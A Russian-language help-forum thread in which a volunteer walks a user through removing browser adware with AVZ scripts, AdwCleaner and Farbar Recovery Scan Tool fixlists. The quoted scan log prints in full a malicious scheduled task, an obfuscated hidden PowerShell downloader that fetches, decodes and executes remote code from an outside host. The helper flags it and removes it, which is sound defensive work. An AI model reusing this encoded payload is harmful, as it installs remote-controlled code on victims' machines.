Тормозят браузеры, редирект и pop up окна [not-a-virus:AdWare.Win32.Agent.jugo ]

**Molotoff** · 20.02.2016, 06:34

Добрый день.

Проблема следующего характера - тормозят браузеры (Opera/Chrome/Firefox), при этом периодически происходит редирект на "левые" сайты и появляются всплывающие pop up окна. Остальных проблем пока не выявлено.

Логи прилагаю.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 20.02.2016, 06:36

Уважаемый(ая) Molotoff, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

SQ · 20.02.2016, 10:18

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

Код:

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end; 
 DelBHO('{5657A9A6-6D99-4753-B5F5-0450BB56F54B}');
 StopService('BAPIDRV');
 DeleteService('BAPIDRV');
 QuarantineFile('C:\Program Files\TNT2\2.0.0.2030\IEToolbar.dll','');
 QuarantineFile('C:\PROGRA~2\9d857855\cf83fce6.dll','');
 QuarantineFile('C:\Windows\system32\DRIVERS\BAPIDRV.sys','');
 DeleteFile('C:\Program Files\TNT2\2.0.0.2030\IEToolbar.dll','32');
 DeleteFile('C:\PROGRA~2\9d857855\cf83fce6.dll','32');
 DeleteFile('C:\Windows\system32\DRIVERS\BAPIDRV.sys','32');
 DeleteFile('C:\Windows\system32\Tasks\{045F7884-8C2A-6096-3A72-45BDBF614B07}','32');
   BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

Код:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

- Подготовьте лог AdwCleaner и приложите его в теме.

- Сделайте лог Check Browsers' LNK и приложите его в теме.

**Molotoff** · 20.02.2016, 10:35

Выполнено.

SQ · 20.02.2016, 10:47

Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

**Molotoff** · 20.02.2016, 14:33

Все удалил, но всплывающие окна еще появляются.

SQ · 20.02.2016, 15:28

- Скачайте Farbar Recovery Scan Tool

и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
Нажмите кнопку Scan.
После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

**Molotoff** · 20.02.2016, 15:39

Выполнено

SQ · 20.02.2016, 16:27

Знакомы расширения в Google chrome?

Код:

FF NewTab: chrome://fvd.speeddial/content/fvd_about_blank.html
FF Homepage: chrome://fvd.speeddial/content/fvd_about_blank.html
FF Extension: Speed Dial [FVD] - New Tab Page, Sync... - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\[email protected] [2016-02-13]

Знакома ли Вам следующая задача в планировщике задач?

Task: {A96E3C2A-1419-400D-B440-8C6BAFAA65F5} - System32\Tasks\{AC3F93E0-C15D-BB72-B94F-9A6756EE64CA} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand OwA7ADsAIAAgACAAIAAgACAAOwAgACAAOwAgADsAOwAgACAAIA A7ADsAOwAgADsAIAAgADsAOwA7ADsAOwAkAEUAcgByAG8AcgBB AGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAH QAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMA bwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcg BlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8AZwBy AGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7AC QAVgBlAHIAYgBvAHMAZQBQAHIAZQBmAGUAcgBlAG4AYwBlAD0A JABzAGMAOwAkAEQAZQBiAHUAZwBQAHIAZQBmAGUAcgBlAG4AYw BlAD0AJABzAGMAOwAKAGYAdQBuAGMAdABpAG8AbgAgAFUATgBS AFEAUwBZAFAAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG 8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcA LQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQ BOAHUAbABsADsAfQBjAGEAdABjAGgAewA7AH0AdAByAHkAewBO AGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAG EAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBQAHIA bwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVg BhAGwAdQBlACAAMgAwADEAMwAyADkANgA2ADQAfABPAHUAdAAt AE4AdQBsAGwAOwAKAH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AF MAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAA YQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQ BsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBO AHUAbABsADsAfQBjAGEAdABjAGgAewB9ACAAfQAgAH0AVQBOAF IAUQBTAFkAUABBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8A bABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcw B0AGUAbQAzADIAXwBXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBT AGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAG wAbAAuAGUAeABlACIAKQA7AFUATgBSAFEAUwBZAFAAQQAoACIA SABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcACUAUwB5AHMAdA BlAG0AUgBvAG8AdAAlAF8AUwB5AHMAdABlAG0AMwAyAF8AcwB2 AGMAaABvAHMAdAAuAGUAeABlACIAKQA7AFUATgBSAFEAUwBZAF AAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcAHQA YQBzAGsAZQBuAGcALgBlAHgAZQAiACkAOwAKACQAcwB1AHIAbA A9ACIAaAB0AHQAcAA6AC8ALwBwAGEAbgBlAGwAagBvAGIALgBp AG4AZgBvAC8AdQAvAD8AcQA9AGsAdQBqAE0AVQBhAHkAUwBsAE sAMABaAGsAZwBLAHIAaQBwAFMAeQBVAEUAbQBUAFAALQB0ADkA MABLAGQAUQBpAGgAdgBMAEIALQBpAFIAUQB1AFMAVQA5AFQAQw B6ADkAZABpAEgAUwBXAHkAMQB4ADgATwAtAEUARwBKAEkAOAAt AFEAVgAtAEYAYgBrAGMAeQA2AEIAdABBAFMAUgBMAGwAbQBUAG 4AWABYAEwATQB0AG8AcABNAGEASwAyAHYAYgAyAGcAVgBXADkA ZQBNADMATQByAHAAUwBmAGUAOABkAFgAcABsAGYAMwBCAHgAdg BIAGgAYwBpAFQAcgBUAGYAUwBNAFQAOAAyADcARwBQAFYAaABC AGEAbQBhAEkANwBRAFgASgB6ADcAegBkAGwAVwBKAGwAMQBoAE 4AYgBUAEEAVgByAFQAUABNAGkAQQBfADMANQAwADAAaQBhAFUA WABnAEYATQBOAHMAQQA1AE0AdQBrADgAdABRADQATwBJADQAXw BtAEoAcQBGAFkAYQA0AGkAcwBmAGgAdABjADEAWgBkAE4AVQB4 AGIAUgBhAFQAUwA2AEIAMgBmAEUAQwBsAGcAVwA0AGMAeABGAD MAbQA0AE4ASQBNAFQAeQB6AGYAZAA5ADgAdABTAE4AUABmAHIA YwBuAGYAeQBtADYAbwBGAFQAcgBMAFEAOABJAG8ALQBCAEkAcQ BtAHYARQByAFMAUgBTAHEASABmAGMAcgBxADAAYgBLAHQAQgBn AE4AbABiAHgAcgBqAEgAWQB3AFUAbgBXAGEANQBZADMAZwAwAD gAbwBiADQAMwAxAG0ANAA0AHgAZwBDAFcAcgBlAGwAYgBoAHMA QgBhAEQAZABiAFQASgBWAGMAVAB3AC0AUQAtAEsARQBYAFkAOQ BGADYAMgByAFQAQwBqAFoAZAAzAFIAcgBTAC0AWAA4AEkAdgB3 ADgASgBJAFgATQA3AFoATQBjAEsASgBkAGIAWQAzAFEAOABlAH IAMQA5AGsAUgBsAGcAQQBTAHAAaQBYAGcAMwBpAEgATgA4AGUA UABCAC0AawBlAC0ARAAzAHkANAB6AFkANAA0AEYANQB6AEsAdA A2AFgAdwAtAEsARwBCAC0ATAB4AGIAZwB1AF8AeABfAFgAZgBq AGQANwBOADMAUQBoAEcANQB0AE4AWQBEAGQARABCADYAagA4AG UASgBIAHoARQA5ADkAOQBsAFIAawBwAGwAdQB5AF8AOQAtAFUA awBGADAAdwAtAGMATwB4AGoAZABlAHgAbgBmAGwAeAByAEYAYg AyAGIATgBRAEQAMgBHAHkATwBtAEMAYgBkAGYAawA4AFkASwBm AGIAMgBJAGsAYgA1AHIAMgBzAEIAYQBJADAAcgBsAGMAUQBfAF EAagBMAGYAQgA2ADYAdABQAEgAUgBQAE0AUwBaAHAALQBVACYA YwA9AEUAVgA3AEcARgBRAEEAMAA3AG8ARgA3ADcAWQBlAE8AVw A0AGYATQBpAHEAUgA4AFUAWAA1ADUAMQBfAFoAeAAwAFEAaABE AHUAdQB4AFMAZwBVADQAUABXAEcAQwBKAHgAUgBiAE4ATQB1AD cAbAB5AEIAdwBxAGoAZwBMAF8AQwB4ADkASABlAEUAQgB6AFYA WQBEADQAVQBOAFIAUQBTAFkAUABBAG4ANQBxAFcAbwB6AGcAWg BVAGkALQBDAEcAeQBSAFUAUQBRAG0AZwBvAFUAYQBaAE4AagBw ADgAZQB3AFoAZABKAHkAaABzADYAdQBGAFcATwBNAFUAWgBDAD QAdQBfAFIAQwA3AFIAUQBUAGwANgBxADAATgAyAEsARAAzAHYA XwBnAFYARQB0AHEATwB1AFAAVwBMAFEAWgBrAHQATQBLAFEAQg BNAFIATgBlAGEAaQB4AEwAUQA1AE4AQQBrAG4AeQBwAEgANwBO AHQAUQBBAEIAaAAtADcAcABFAHUARgBEAHUAdQB5AHEASABJAD UARABDADEAUgBFAGsAVwBZAEwANQBTAGsAZgBKAFkANAB1AF8A SwBEAFkAZwBYAG0ARgB1AGgAaQBXAHQAQQBzAFgAQwA3AGIAaQ BHAGEAcABBADkATgBaAEwAWgBCAEYAYwBkAEwAZgBjAGYANgBw AHcATQBrAFkAbQA1AFMAdgBiAFEAYgB5AEoAVgBWADUAYgBPAF gASQBqAFIAcgBNAFoAYwAwAFAATgA1AE8AaQBCAGMAMQA5AHgA RwBfAG4AMwBKADcATQBPAHoAUgBWADkAdAA3AEMAWAA2AEYAbA B4AEEAZgAzAFUAQQA2AEwAMABfAHAAQgBFADUAawBGAFIASQBk AEYAbgBjAEIANABBAE4AZgB6AHMAYwBKADAASQBRAEwAdQBoAE 4AcwBGAHgAeQBSADAAWQBQAGQAVABXAEYAZQBHADgAdAAzAGMA cwAtAG8AQgB6AFcAWQBwAE8ASgBJAEIAOABTAFkAVwBoAEoAaA BIAEsAZgBaADYARwBNAEMAcgBqAEIASQBRAFoAZQBhAFoAawB5 ADQAQgA4AGoASgBPAFgAMABtAEIASABUAHgAZwBfADEAWQByAH IAMAA3AGwAUwBPADkAOQBJAFYAUwA4AHMATAB4AGkAWAB0ADkA cgB6AHQAUgBwAG4AQgBEAGsASgB4AGIAcQB5AEEAOQBMAF8Adg BmAEIAbwBUADYASQBrAGcAQgBiAFkAVwBlAFYAMQBZAHMAcwB5 AFYASQAtAF8ASgBYAHkAYwBmAEsAcQBIAEMAdgBjADEALQBlAF AAbABVAFUAaQBaAGsAbABnAE8AWQBxADUATwAzADkAdABMAF8A eQBtAEYAUQBuAHIAaABKAEQAQwBnAEIAbgBIAFgAVABKAFoAcQ AzAHkAbQA2AEQAaQBsAEEANAAtADUAbABvAEQAVQBqAGEAMQBY AHcATgBvAG4ARAB4AGoAUQB4AHMAOQA4AHgAQQBnAE4AegAtAF QAWQBfAFEAeQBWAGYARAB6AHUAeAAtAGsAZQBKAEoAbwBaAGMA SAB4AFcAUwBaADMAeABBAGEAOABOADUATQAyAFIAXwBwADYAUg B4AHQASABIAFgAYQBJAG4AagAwADcAMgBoAFoAagBfAE0AdgBs AHoAMgBoAF8AUABfAHQAdwB6AGcAUwBfAGQAOABUAFMAUgBSAE 4AOABpAEYATwBwAHoATgA3AFoAQgAtAHUARQBoAEUAUwBQAFIA SABaAE4AWABfAHQARABuAFcAagBIAHMAWQBCADMAbwBEAGkASg BhACYAcgA9ADMAMgAwADIAMgAzADMANgA1ADQAMwAxADcANwA0 ADQAMgA3ADYAIgA7ACQAcwB0AHMAawA9ACIAewBBAEMAMwBGAD kAMwBFADAALQBDADEANQBEAC0AQgBCADcAMgAtAEIAOQA0AEYA LQA5AEEANgA3ADUANgBFAEUANgA0AEMAQQB9ACIAOwAkAHAAcg BpAGQAPQAiAEQAVAAiADsAJABpAG4AaQBkAD0AIgAwACIAOwB0 AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAG IAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIA IAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWw BTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABd ADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG 4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAA NQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdA AgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBP AGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AG kAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAA YQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdA AgADIAKQApAHsAYgByAGUAYQBrADsACgB9ADsAfQAKAGkAZgAo AC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAG kAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4A YwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQ BuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0 AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApAC kALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQA eQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcw BCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBu AGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AD sAfQAKAGYAdQBuAGMAdABpAG8AbgAgAFEATwBVAFAATQBNAFMA TABEAEMAQgAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQ BPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBX AGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAG YAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQA cgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZA AoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBp AGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAG UAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcA cwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbg AgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBk AGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAG kAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQA YQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8Abg AgAE0AWQBUAEMAVQBIAEEAUQBZAFcAVQBPAFQAUQBDACgAJABy AGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAH IAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkA bgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJA BiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAt AGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7AC QAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQA aQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJA BpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAk AGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AAoAfQAKAH IAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkA TwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQ BPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBp AG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE 4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIA eQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALg BMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAu AEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAH MAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIA ZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOw A7AH0ACgAkAHMAYwA9AE0AWQBUAEMAVQBIAEEAUQBZAFcAVQBP AFQAUQBDACgAUQBPAFUAUABNAE0AUwBMAEQAQwBCACgAJABzAH UAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMA cwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIg A7AH0AYwBhAHQAYwBoAHsAIAB9ADsAZQB4AGkAdAAgADAAOwA=

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

Код:

CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-396966855-316378592-212668334-1000 -> eShield - {5657A9A6-6D99-4753-B5F5-0450BB56F54B} - C:\Program Files\TNT2\2.0.0.2030\IEToolbar.dll No File
CHR Extension: (No Name) - C:\Users\IlyinBoris\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdefnbcpjeflgggkipfemfckjicceiii [2016-02-20]
OPR Extension: (No Name) - C:\Users\IlyinBoris\AppData\Roaming\Opera Software\Opera Stable\Extensions\lpeofjegddnliokakpdejbnafmdcihdc [2016-02-20]
2016-02-20 08:56 - 2016-02-20 08:56 - 00000000 ____D C:\Users\Все пользователи\bd45723b-0673-0
2016-02-20 08:56 - 2016-02-20 08:56 - 00000000 ____D C:\ProgramData\bd45723b-0673-0
2016-02-20 08:51 - 2016-02-20 15:23 - 00000000 ____D C:\Users\Все пользователи\9d857855
2016-02-20 08:51 - 2016-02-20 15:23 - 00000000 ____D C:\ProgramData\9d857855
2016-02-20 08:51 - 2016-02-20 08:51 - 00000000 ____D C:\Users\Все пользователи\bd45723b-32b5-0
2016-02-20 08:51 - 2016-02-20 08:51 - 00000000 ____D C:\ProgramData\bd45723b-32b5-0
2016-02-20 08:52 - 2016-01-13 23:14 - 00000000 ____D C:\Users\Все пользователи\55f510af-5de3-1
2016-02-20 08:52 - 2016-01-13 23:14 - 00000000 ____D C:\ProgramData\55f510af-5de3-1
2016-02-20 08:51 - 2016-01-13 23:14 - 00000000 ____D C:\Users\Все пользователи\55f510af-57d7-0
2016-02-20 08:51 - 2016-01-13 23:14 - 00000000 ____D C:\ProgramData\55f510af-57d7-0
C:\Users\IlyinBoris\AppData\Local\Temp\{10E372BA-EB23-4880-8C68-0A1974ABFDEA}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{7119B76B-831D-4E0C-B41B-18A8CDD6C399}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{7E9C4DA1-8154-4EF9-98B5-96986D77D842}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{8D06E5B9-5820-4286-97D2-DCE6281DA2F7}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{98BE41D2-2A75-468F-9590-B25647F90878}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{9F1E3469-BE90-4577-BC51-84D60CCC7A50}.dll
C:\Users\IlyinBoris\AppData\Local\Temp\{FB447DCF-8089-4125-A851-9859E4A8CB81}.dll
CustomCLSID: HKU\S-1-5-21-396966855-316378592-212668334-1000_Classes\CLSID\{5657A9A6-6D99-4753-B5F5-0450BB56F54B}\InprocServer32 -> C:\Program Files\TNT2\2.0.0.2030\IEToolbar.dll => No File
Task: {3A180A6C-A248-4769-B220-58079E4E2BDB} - \{045F7884-8C2A-6096-3A72-45BDBF614B07} -> No File <==== ATTENTION
Task: {C6FF3D16-8765-49C4-A0FE-68D744CD8561} - no filepath
Task: {F1103D4A-2C92-44AE-B559-688CF8581291} - System32\Tasks\VKSaverUpdate => C:\ProgramData\VKSaver\VKSaver.exe [2015-06-15] (AudioVkontakte.ru) <==== ATTENTION
AlternateDataStreams: C:\ProgramData\TEMP:D8999815
AlternateDataStreams: C:\Users\IlyinBoris\Documents\pismo IDSTU.jpeg:3or4kl4x13tuuug3Byamue2s4b
AlternateDataStreams: C:\Users\IlyinBoris\Documents\pismo IDSTU.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
AlternateDataStreams: C:\Users\Все пользователи\TEMP:D8999815
Reboot:

Запустите FRST и нажмите один раз на кнопку Fix и подождите.
Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Обратите внимание, что компьютер будет перезагружен.

**Molotoff** · 20.02.2016, 16:58

ни задача ни расширения эти мне не знакомы. Лог прилагаю

SQ · 20.02.2016, 17:16

Для удаление расширений в google chrome:

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

Код:

CreateRestorePoint:
CloseProcesses:
FF NewTab: chrome://fvd.speeddial/content/fvd_about_blank.html
FF Homepage: chrome://fvd.speeddial/content/fvd_about_blank.html
FF Extension: Speed Dial [FVD] - New Tab Page, Sync... - C:\Users\IlyinBoris\AppData\Roaming\Mozilla\Firefox\Profiles\robziw0u.default\extensions\[email protected] [2016-02-13]
Reboot:

Запустите FRST и нажмите один раз на кнопку Fix и подождите.
Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Обратите внимание, что компьютер будет перезагружен.

по задачи в планировщике задач, убедитесь, чтобы она не принадлежало например приложению 1С.

- - - - -Добавлено - - - - -

Похоже на вредонос, я Вам отправил раскодированный текст в лс, ознакомьтесь если также в этом убеждены примените следующий фикс.

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

Код:

CreateRestorePoint:
CloseProcesses:
Task: {A96E3C2A-1419-400D-B440-8C6BAFAA65F5} - System32\Tasks\{AC3F93E0-C15D-BB72-B94F-9A6756EE64CA} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand OwA7ADsAIAAgACAAIAAgACAAOwAgACAAOwAgADsAOwAgACAAIAA7ADsAOwAgADsAIAAgADsAOwA7ADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAVgBlAHIAYgBvAHMAZQBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAEQAZQBiAHUAZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAKAGYAdQBuAGMAdABpAG8AbgAgAFUATgBSAFEAUwBZAFAAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewA7AH0AdAByAHkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMgAwADEAMwAyADkANgA2ADQAfABPAHUAdAAtAE4AdQBsAGwAOwAKAH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9ACAAfQAgAH0AVQBOAFIAUQBTAFkAUABBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAKQA7AFUATgBSAFEAUwBZAFAAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcACUAUwB5AHMAdABlAG0AUgBvAG8AdAAlAF8AUwB5AHMAdABlAG0AMwAyAF8AcwB2AGMAaABvAHMAdAAuAGUAeABlACIAKQA7AFUATgBSAFEAUwBZAFAAQQAoACIASABLAEMAVQA6AFwAQwBvAG4AcwBvAGwAZQBcAHQAYQBzAGsAZQBuAGcALgBlAHgAZQAiACkAOwAKACQAcwB1AHIAbAA9ACIAaAB0AHQAcAA6AC8ALwBwAGEAbgBlAGwAagBvAGIALgBpAG4AZgBvAC8AdQAvAD8AcQA9AGsAdQBqAE0AVQBhAHkAUwBsAEsAMABaAGsAZwBLAHIAaQBwAFMAeQBVAEUAbQBUAFAALQB0ADkAMABLAGQAUQBpAGgAdgBMAEIALQBpAFIAUQB1AFMAVQA5AFQAQwB6ADkAZABpAEgAUwBXAHkAMQB4ADgATwAtAEUARwBKAEkAOAAtAFEAVgAtAEYAYgBrAGMAeQA2AEIAdABBAFMAUgBMAGwAbQBUAG4AWABYAEwATQB0AG8AcABNAGEASwAyAHYAYgAyAGcAVgBXADkAZQBNADMATQByAHAAUwBmAGUAOABkAFgAcABsAGYAMwBCAHgAdgBIAGgAYwBpAFQAcgBUAGYAUwBNAFQAOAAyADcARwBQAFYAaABCAGEAbQBhAEkANwBRAFgASgB6ADcAegBkAGwAVwBKAGwAMQBoAE4AYgBUAEEAVgByAFQAUABNAGkAQQBfADMANQAwADAAaQBhAFUAWABnAEYATQBOAHMAQQA1AE0AdQBrADgAdABRADQATwBJADQAXwBtAEoAcQBGAFkAYQA0AGk